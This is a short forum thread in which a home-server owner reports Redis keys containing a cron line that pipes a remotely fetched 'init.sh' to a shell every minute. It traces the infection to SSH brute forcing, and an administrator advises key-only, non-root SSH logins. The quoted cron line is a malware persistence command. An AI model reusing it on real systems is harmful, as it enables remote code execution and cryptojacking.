You are not logged in.

#1 2020-07-26 15:15:56

GABOSNAKE
Member
Registered: 2014-04-22
Posts: 2

[SOLVED] Redis cryptomalware

Hey guys,

Yesterday I found something interesting in my home server. It runs redis as a docker image. I start to notice that all my keys on redis where deleted after some time. After some testing I found 4 mysterious keys with value in the form:

 */1 * * * * curl url/init.sh |sh 

For the research I made I know that it is a kind of crypto malware that use crone but the question is, how I get infected? I download the script init.sh but nothing.

So guys I am asking for your help to any advice to get started finding the origin of this. It could be possible get infected trough my laptop and then my home server. Maybe with a website java script?

My home server runs 5.4.5-arch1-1 #1 SMP PREEMPT Wed, 18 Dec 2019 19:48:51 +0000 x86_64 GNU/Linux
My laptop runs 5.7.8-arch1-1 #1 SMP PREEMPT Thu, 09 Jul 2020 16:34:01 +0000 x86_64 GNU/Linux

Thanks for your help.

Last edited by GABOSNAKE (2020-07-26 16:38:26)

Offline

#2 2020-07-26 16:22:02

GABOSNAKE
Member
Registered: 2014-04-22
Posts: 2

Re: [SOLVED] Redis cryptomalware

I found it, my server was ssh brute forced even when the ssh server was listening in other port. I forgot that ssh was exposed to internet.

Thanks.

Last edited by GABOSNAKE (2020-07-26 17:11:44)

Offline

#3 2020-07-26 16:26:37

ewaller
Administrator
From: Pasadena, CA
Registered: 2009-07-13
Posts: 17,363

Re: [SOLVED] Redis cryptomalware

Be sure to make your thread as solved by editing your first post and prepending [SOLVED] to the title.
I suggest you not allow root logins via ssh, require ssh keys, an disallow password logins via ssh.

Last edited by ewaller (2020-07-26 16:26:50)


Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday
Sometimes it is the people no one can imagine anything of who do the things no one can imagine. -- Alan Turing
---
How to Ask Questions the Smart Way

Offline

Board footer

Powered by FluxBB